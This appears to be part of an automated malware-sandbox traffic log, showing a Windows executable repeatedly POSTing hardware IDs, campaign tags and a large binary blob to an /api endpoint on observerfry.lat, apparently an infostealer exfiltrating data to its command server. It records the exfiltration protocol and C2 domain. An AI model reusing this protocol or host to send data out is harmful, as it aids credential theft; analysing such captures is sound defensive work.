                                                                                                                                                              2024-12-24 10:22:23 UTC15093OUTData Raw: 2d 2d 45 38 59 48 57 39 57 4a 37 54 4c 35 36 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 43 44 46 37 38 39 32 39 35 30 36 37 46 46 31 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 45 38 59 48 57 39 57 4a 37 54 4c 35 36 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 45 38 59 48 57 39 57 4a 37 54 4c 35 36 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d
                                                                                                                                                              Data Ascii: --E8YHW9WJ7TL56BAContent-Disposition: form-data; name="hwid"7CDF789295067FF1BEBA0C6A975F1733--E8YHW9WJ7TL56BAContent-Disposition: form-data; name="pid"2--E8YHW9WJ7TL56BAContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic-
                                                                                                                                                              2024-12-24 10:22:23 UTC1123INHTTP/1.1 200 OK
                                                                                                                                                              Date: Tue, 24 Dec 2024 10:22:23 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              Set-Cookie: PHPSESSID=g3hf62f99mpp7vk5f08kv1a8q3; expires=Sat, 19 Apr 2025 04:09:02 GMT; Max-Age=9999999; path=/
                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                              vary: accept-encoding
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2uMMXh82vUNJUOqC9VmzTcab9swpl2jr091DQ2Rgoda%2BezTX1y6ymGlRj5H3yK1HhyJ8NcgFaklMGb1DY71ZsZFTPSCL7dA9mbLYQxkprv2vX6oIT8RYcsJrSqghb4UX4ZI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8f6fdeb32fe8437e-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1592&min_rtt=1589&rtt_var=598&sent=11&recv=19&lost=0&retrans=0&sent_bytes=2836&recv_bytes=16029&delivery_rate=1837633&cwnd=236&unsent_bytes=0&cid=cc78339b8d3a947d&ts=907&x=0"
                                                                                                                                                              2024-12-24 10:22:23 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                              2024-12-24 10:22:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              4192.168.2.649739104.21.36.201443404C:\Users\user\Desktop\fnCae9FQhg.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-12-24 10:22:25 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: multipart/form-data; boundary=481B5SIFX1Y4XKA
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                              Content-Length: 19951
                                                                                                                                                              Host: observerfry.lat
                                                                                                                                                              2024-12-24 10:22:25 UTC15331OUTData Raw: 2d 2d 34 38 31 42 35 53 49 46 58 31 59 34 58 4b 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 43 44 46 37 38 39 32 39 35 30 36 37 46 46 31 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 34 38 31 42 35 53 49 46 58 31 59 34 58 4b 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 34 38 31 42 35 53 49 46 58 31 59 34 58 4b 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d
                                                                                                                                                              Data Ascii: --481B5SIFX1Y4XKAContent-Disposition: form-data; name="hwid"7CDF789295067FF1BEBA0C6A975F1733--481B5SIFX1Y4XKAContent-Disposition: form-data; name="pid"3--481B5SIFX1Y4XKAContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic-
                                                                                                                                                              2024-12-24 10:22:25 UTC4620OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49 00
                                                                                                                                                              Data Ascii: +?2+?2+?o?Mp5p_oI
                                                                                                                                                              2024-12-24 10:22:26 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                              Date: Tue, 24 Dec 2024 10:22:26 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              Set-Cookie: PHPSESSID=6bbg5opcoe6av7s6uegh7m9f1j; expires=Sat, 19 Apr 2025 04:09:05 GMT; Max-Age=9999999; path=/
                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                              vary: accept-encoding
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iFSFuPYkXNey4Rh1Rv79si2hsEtK1jH4e3rdYoXYrySWpW%2F7bpfhGoMWwYKVkQOlS%2FV4%2FGaVGNP94JSA71gPV4suj7QL9LXlXBZernyCLco%2FBkzcPOdQZr3NoQB5jQmwRQg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8f6fdec43fa9c472-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1628&min_rtt=1620&rtt_var=623&sent=13&recv=23&lost=0&retrans=0&sent_bytes=2836&recv_bytes=20909&delivery_rate=1732937&cwnd=234&unsent_bytes=0&cid=4d3d93c5f455afd5&ts=937&x=0"
                                                                                                                                                              2024-12-24 10:22:26 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                              2024-12-24 10:22:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              5192.168.2.649745104.21.36.201443404C:\Users\user\Desktop\fnCae9FQhg.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-12-24 10:22:28 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: multipart/form-data; boundary=UNL82YRDMF7E0
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                              Content-Length: 1206
                                                                                                                                                              Host: observerfry.lat
                                                                                                                                                              2024-12-24 10:22:28 UTC1206OUTData Raw: 2d 2d 55 4e 4c 38 32 59 52 44 4d 46 37 45 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 43 44 46 37 38 39 32 39 35 30 36 37 46 46 31 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 55 4e 4c 38 32 59 52 44 4d 46 37 45 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 55 4e 4c 38 32 59 52 44 4d 46 37 45 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 55 4e 4c 38 32
                                                                                                                                                              Data Ascii: --UNL82YRDMF7E0Content-Disposition: form-data; name="hwid"7CDF789295067FF1BEBA0C6A975F1733--UNL82YRDMF7E0Content-Disposition: form-data; name="pid"1--UNL82YRDMF7E0Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--UNL82
                                                                                                                                                              2024-12-24 10:22:29 UTC1128INHTTP/1.1 200 OK
                                                                                                                                                              Date: Tue, 24 Dec 2024 10:22:29 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              Set-Cookie: PHPSESSID=5ochdrnbs0c0v15mfs7r5ugv4l; expires=Sat, 19 Apr 2025 04:09:08 GMT; Max-Age=9999999; path=/
                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                              vary: accept-encoding
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vFWgIjQ9l0szfiBfu6fKaErgUvtI1DZ90Sg7bU0w4jUaKDScEPN%2BkOchDYxRv%2Bh4STOgJ%2F%2FPyc5zY0KP1%2Bekh7cpF3DC5RBcIxKW6fNceCG4JQiFptHMs4gJc4UM2RRmnPQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8f6fded71bf34261-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1672&min_rtt=1663&rtt_var=642&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=2117&delivery_rate=1682027&cwnd=239&unsent_bytes=0&cid=ac921c05bc7e9c16&ts=778&x=0"
                                                                                                                                                              2024-12-24 10:22:29 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                              2024-12-24 10:22:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              6192.168.2.649752104.21.36.201443404C:\Users\user\Desktop\fnCae9FQhg.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-12-24 10:22:31 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: multipart/form-data; boundary=JZV35BLGTBG5B66
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                              Content-Length: 572528
                                                                                                                                                              Host: observerfry.lat
                                                                                                                                                              2024-12-24 10:22:31 UTC15331OUTData Raw: 2d 2d 4a 5a 56 33 35 42 4c 47 54 42 47 35 42 36 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 43 44 46 37 38 39 32 39 35 30 36 37 46 46 31 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 4a 5a 56 33 35 42 4c 47 54 42 47 35 42 36 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4a 5a 56 33 35 42 4c 47 54 42 47 35 42 36 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d
                                                                                                                                                              Data Ascii: --JZV35BLGTBG5B66Content-Disposition: form-data; name="hwid"7CDF789295067FF1BEBA0C6A975F1733--JZV35BLGTBG5B66Content-Disposition: form-data; name="pid"1--JZV35BLGTBG5B66Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic-
                                                                                                                                                              2024-12-24 10:22:31 UTC15331OUTData Raw: 3f 4d 9f 65 1a 44 1a 02 bd 48 8a 15 26 95 6a 51 28 4a ff 2d d6 b1 72 cc 77 f9 47 44 0e e8 14 f2 b9 ad 9b 02 3a 2b 11 29 c0 e9 99 f2 c5 57 b6 bd 21 75 3e b9 83 5f e1 97 f7 7a 8d 66 8b cd 6d ce f3 d7 24 c9 12 69 b0 27 8b 6f c6 f0 d1 e6 d1 03 93 6d 06 7a ef ab 92 88 17 ae bd aa 64 f7 3e 4f 82 82 ed 67 cf 92 0a 56 ec 9c 28 62 d0 7d 9d 22 a4 20 d7 57 f2 06 51 20 cb d6 f9 83 67 8a c1 c7 a2 3b 33 26 e9 cc ce ea 45 61 f0 70 a7 e3 83 e4 3c 8b e6 27 01 6a 59 db fb e9 bf 98 ec 17 40 9c f1 d5 13 25 05 d6 c5 cd e7 1c aa c7 65 b9 c1 98 c1 78 51 13 b6 df 88 bd 75 93 0d b4 08 21 99 6d 85 ac 94 9d 1c d5 e3 41 f0 d7 28 fd a7 a1 21 14 eb 70 ed 9d 0e 4e 0b da ea 83 79 97 e6 70 76 50 58 fd fe ff 7f 10 a7 3e 90 98 51 05 43 10 70 22 24 23 c9 6d b9 13 9a c2 4f 96 ba 96 11 11 59
                                                                                                                                                              Data Ascii: ?MeDH&jQ(J-rwGD:+)W!u>_zfm$i'omzd>OgV(b}" WQ g;3&Eap<'jY@%exQu!mA(!pNypvPX>QCp"$#mOY
                                                                                                                                                              2024-12-24 10:22:31 UTC15331OUTData Raw: 5f 5f e6 95 12 cc da 88 da 2d 70 ff 38 41 0e 64 ed 53 ee 45 49 bc 40 df 76 aa e7 c0 8a 43 70 39 2f 30 b5 cc d4 c6 3a 3d 76 4c 47 9b 96 65 3c 85 3d a5 cd 48 d7 91 70 85 fb 08 2d 69 0d 78 93 3a d1 7a ea 2c 1b e1 4c 63 f8 c3 27 d1 08 d4 fa 9c 16 70 e2 a3 2e 89 75 05 c2 1f f7 13 e2 96 f4 b5 99 22 e8 43 0b d9 f3 e6 23 e1 5a 26 64 8e 35 ab cd ac 37 92 a7 cf eb 2b ae 51 6b 6d 40 72 31 7a b1 86 a6 25 35 03 d1 bc da a5 33 a5 a8 d2 14 e9 02 f6 bd 19 c6 25 67 e2 12 62 e9 7e 5a 4a c2 a5 32 a9 08 f6 83 af d9 0f 87 db 0c 1b 1e c9 05 c9 f3 1c 40 6d 4a 1c ed a3 62 92 91 c0 b4 29 cf 21 fd d0 66 5b 6c 23 cd 4f 39 ed 78 e4 b7 46 79 39 18 c7 38 21 d3 78 bc ea e1 99 d3 9f 8e 27 0b f4 08 7e 67 c8 3f 04 79 8d bc c4 65 73 de b4 9f e8 8d b3 3f 70 e3 32 13 5f a2 23 b4 d1 9d 42 21
                                                                                                                                                              Data Ascii: __-p8AdSEI@vCp9/0:=vLGe<=Hp-ix:z,Lc'p.u"C#Z&d57+Qkm@r1z%53%gb~ZJ2@mJb)!f[l#O9xFy98!x'~g?yes?p2_#B!
                                                                                                                                                              2024-12-24 10:22:31 UTC15331OUTData Raw: 1c a5 07 07 bf ff 58 81 ec 4c 61 ab 00 be 73 6b 20 33 77 8a eb 99 03 2f 71 e9 04 9a dd 38 cf 29 65 9a 2a 20 c0 f1 ce 4c 7d e4 c4 75 ad c4 24 cd 4b 3c 35 9b 50 af e2 a9 45 ab 43 0e 02 e0 83 63 0b dc d0 32 8c db a7 56 e3 5e be 7c 8a 7a 10 f6 68 69 44 29 f6 e7 14 25 61 6f 33 cf 1b 84 16 dd ec 59 4f 16 2e df f9 7e 6c 31 db 8d 87 b8 d6 4f 93 79 86 e6 60 60 f5 22 6e 5f bb 0c c1 e5 f1 97 da c4 50 17 01 33 37 9c 56 cf b1 4f df 77 ac 86 9f 9f c1 c3 0d 66 16 6b 4d 50 d1 c8 d0 68 0a ff 46 47 4f 96 36 31 81 af cf 3a bf 19 fd 10 46 88 f1 8a fb d3 db 39 28 5d fa 5a 2d 1f ad 2a 09 3b 21 a7 74 a3 df a1 eb 0b fd 38 2c b3 7c 5d 9c 5f a8 41 dd c2 58 f9 9b d2 5d 2a 68 2d 16 2c 94 71 98 10 ba 02 ac 8f bd 0c 37 e5 45 29 db 69 8e af aa c1 a1 82 1e 32 37 71 14 c6 ec ad 65 51 b5
                                                                                                                                                              Data Ascii: XLask 3w/q8)e* L}u$K<5PECc2V^|zhiD)%ao3YO.~l1Oy``"n_P37VOwfkMPhFGO61:F9(]Z-*;!t8,|]_AX]*h-,q7E)i27qeQ
                                                                                                                                                              2024-12-24 10:22:31 UTC15331OUTData Raw: 99 dc e8 6f f7 7c 43 3e 5d 37 f9 7f 78 1f 71 89 62 d3 29 82 65 98 04 bc b7 51 8b 42 3c a4 3a 3b 42 d7 b6 7e 1d 95 c8 78 98 6b 2a 30 26 5e 75 59 3f 7b f1 f4 70 a6 a1 80 97 9f 96 42 0c ff 6a 4e bb e6 51 b1 56 38 41 60 8f ae f3 29 12 35 92 90 7c b7 f5 77 d6 0a fb 8b e0 f1 05 5f e7 ab d1 98 c1 f7 80 f8 07 c8 ab a2 d3 04 81 c3 a4 7a d3 cd 03 3c 98 68 71 f0 01 8d 18 46 7b de 96 48 d6 1b 06 ac 6b a1 f9 cd bc ff b7 20 df 61 77 2d e3 ff 6e e2 79 01 b0 32 0e 3b 83 02 69 53 22 c4 00 70 0b a9 8f 04 a1 67 07 d3 08 28 28 9a 2c cb cb c3 7a 51 3a b6 94 0b 32 e1 b5 18 80 9c 54 9e 15 f8 24 02 6e 09 f8 9c a5 a0 5d 71 af 69 5f 1b 9e dd 4f 34 f9 a7 49 fa ab be 5a 4c 90 ec 12 57 70 a1 82 b9 94 ea 28 de 6e f4 5b 31 ac 34 70 fe 96 3d dc fc 18 8e 92 a1 c7 84 b7 c6 e0 a8 96 11 9f
                                                                                                                                                              Data Ascii: o|C>]7xqb)eQB<:;B~xk*0&^uY?{pBjNQV8A`)5|w_z<hqF{Hk aw-ny2;iS"pg((,zQ:2T$n]qi_O4IZLWp(n[14p=
                                                                                                                                                              2024-12-24 10:22:31 UTC15331OUTData Raw: 9d 8d 44 15 00 5c a0 a3 98 b7 a3 d8 ec e3 a9 f5 9a c3 2f dc 8e 86 fb df 87 86 d9 3b 61 2f 6a f4 33 12 04 e7 42 8d 90 eb 1b 48 d6 fc a0 a4 f7 f0 7b e5 da 85 7b 82 0b 3d 1a 6a 10 7d e0 70 ad c2 ce 8e fa ce 47 ea 8c 29 f9 ce 16 61 c0 f7 7a 56 a1 4b 48 f7 3b f6 d0 75 d9 9c 61 83 c9 05 ea cc df 9e 8a 0a cd 99 8f b8 29 87 c4 22 55 f5 fe 9c 31 69 4a ad 16 ee fa d3 9d f3 de 2e d1 ac a8 69 51 ee 01 c7 20 f9 0b b9 6e 99 13 56 8a 63 0f 0f b2 1a ef 4d c8 cf d1 94 2a ea ac cd ce 35 2a 65 75 1f 92 e9 9d bf 08 d1 de 70 51 aa 98 3f 2f 22 69 4d bf ab 60 91 c5 03 a7 ce 9c 67 c3 43 0e 3d d8 2b 3d 0a 2d 8b fc 52 60 83 17 65 01 81 0d 3e c8 93 cc 7a 61 8b e1 7a fb ec 0d 06 a3 0f c5 ac ab 4b 22 69 ce 38 3a fc bb 1f 4a 82 ee 6d c5 5e 6b 5b e3 03 07 aa 50 9f 5b b7 0f df 66 d9 df
                                                                                                                                                              Data Ascii: D\/;a/j3BH{{=j}pG)azVKH;ua)"U1iJ.iQ nVcM*5*eupQ?/"iM`gC=+=-R`e>zazK"i8:Jm^k[P[f
                                                                                                                                                              2024-12-24 10:22:31 UTC15331OUTData Raw: 7f dc 3c 98 db c6 77 95 f6 71 29 a4 b3 62 bc 2c ef d3 c1 58 d2 c7 da 8e d7 cb 76 3f 42 ea 84 33 65 1d fd 5a c4 ef 25 0c 56 0f bf 09 fd 55 7b 76 ee e3 ed dd 51 69 0b 7a 58 0b 47 72 2f 10 3c 2e 9a b2 3e f2 ad 0b 80 ba 92 13 e7 77 85 bc d4 6d 9e cb c0 ef 02 c8 8a a1 84 b6 d6 c1 cb a3 30 86 ff 0b 59 ff 26 74 04 ce 99 a1 27 0f 75 80 34 9f 20 44 90 15 2a 07 1a 63 b0 7a a2 55 8b a4 58 52 5c 9a 21 0f e5 3a 05 c6 2b 80 bd 2d 68 0a 05 f6 a1 0c 98 8d c9 7a 31 13 8c 9b 7c 7e cd 50 f3 a2 9f 33 ae bb 43 ea 4a 15 ee fc 4e 94 ac 01 78 59 92 4c 13 6a 35 32 21 e8 af 5a f1 e1 4d 02 10 6a 1a 9d d2 94 6a 77 3e bf 0f 19 41 40 64 ad d7 a3 f8 fe b2 cb 66 c6 4d c6 25 7b 7a ae 3f f1 be 40 1d 08 f0 43 f6 5d 26 9a 54 63 c1 58 ad ef da a3 c7 c4 85 37 b2 1a c7 0f 60 41 bb 1e d8 4a 90
                                                                                                                                                              Data Ascii: <wq)b,Xv?B3eZ%VU{vQizXGr/<.>wm0Y&t'u4 D*czUXR\!:+-hz1|~P3CJNxYLj52!ZMjjw>A@dfM%{z?@C]&TcX7`AJ
                                                                                                                                                              2024-12-24 10:22:31 UTC15331OUTData Raw: b8 19 5d 41 18 a8 b6 c0 9a d8 f4 93 c0 5e 12 ed f3 42 a2 67 86 0f 1c e0 73 44 03 5e 9a 67 03 ac c7 46 e1 52 d4 1b 09 ec f9 0f b4 6f 63 ee 4e e1 6f 7b 78 15 86 9d ba 93 fd e4 e6 52 8e 99 00 c2 a6 9b 22 08 8d 9f 24 23 39 5e fb b1 ca 74 e5 bd c6 b2 1d bf 51 bb e8 f7 fe 56 42 03 54 b2 5c a3 11 d9 60 c5 1e 75 16 90 cd c9 31 71 ae 52 94 33 00 81 4f 53 a8 dc 69 4e be 46 66 ec 84 b2 0d 80 24 98 9e 35 45 d4 a9 54 ad dc 6d 4c 3e 77 1f 9b 11 39 bd 6a 03 64 40 e6 90 5d 6b 76 4b e4 9b 09 cc 8f e0 16 da 9b c7 91 6f 67 ac 14 22 c7 2e 3c 5a b0 33 9d 2a 20 26 40 ad 71 54 08 7c 9b 6b 3d a6 7d 89 9e 8c 86 2d 14 99 63 46 c0 fc ce dc ce f9 13 f8 bc 45 1e 72 90 e5 2f 5f 74 41 d0 d9 19 81 ba 66 e4 b8 53 f5 e9 e8 36 96 af b3 c6 75 2b eb 38 ac 34 43 c4 1a 77 36 db f2 3d 81 4e b8
                                                                                                                                                              Data Ascii: ]A^BgsD^gFRocNo{xR"$#9^tQVBT\`u1qR3OSiNFf$5ETmL>w9jd@]kvKog".<Z3* &@qT|k=}-cFEr/_tAfS6u+84Cw6=N
                                                                                                                                                              2024-12-24 10:22:31 UTC15331OUTData Raw: 4c 4b 34 07 83 68 8c 9e 1e b4 fc 98 47 9e f8 97 8c 9c 9f 48 51 cc c9 ea 64 d3 59 57 25 ec ea e9 b5 fa 3d 06 eb d8 b9 1b 2d 2e 54 d6 7f c6 21 9f 8d a7 b1 3d 61 f6 7b 0f 36 eb bf 48 2e 7a d5 d3 74 cc 1d 99 02 b2 63 af 7d c5 d5 14 be 1a b3 1b 53 8c c8 46 90 ef 76 51 2f 73 43 8e 2f 3a 1b e2 92 67 a2 c3 51 51 7e 9f 69 38 a9 b0 fe b4 42 67 cf 4d ad 68 cf 07 30 7e bb 95 8a b9 e9 dd 3e d2 a5 ac 00 e1 e9 7c 53 c5 6f 8b ad 3f f0 05 d0 d2 fe a5 13 e0 98 1e 51 d0 1c 20 45 ff db 0d ce c5 a5 de 9d 78 ed 96 44 b1 72 ab 91 15 9c 08 f9 cd 52 56 f9 b9 f9 06 fc e8 57 80 e7 2e 35 38 cd 67 5d d3 59 bf a9 07 48 dd a0 f8 7f 95 d2 5d 0b 1a 78 08 51 c2 ae 5e 2c 53 d7 bb 99 c7 53 f3 68 90 e8 60 c8 94 91 70 a3 ff e5 bd ef d5 21 82 0e f2 fd 03 09 3a 43 8c 4b 1b 2f 1c 92 9d c0 88 68
                                                                                                                                                              Data Ascii: LK4hGHQdYW%=-.T!=a{6H.ztc}SFvQ/sC/:gQQ~i8BgMh0~>|So?Q ExDrRVW.58g]YH]xQ^,SSh`p!:CK/h
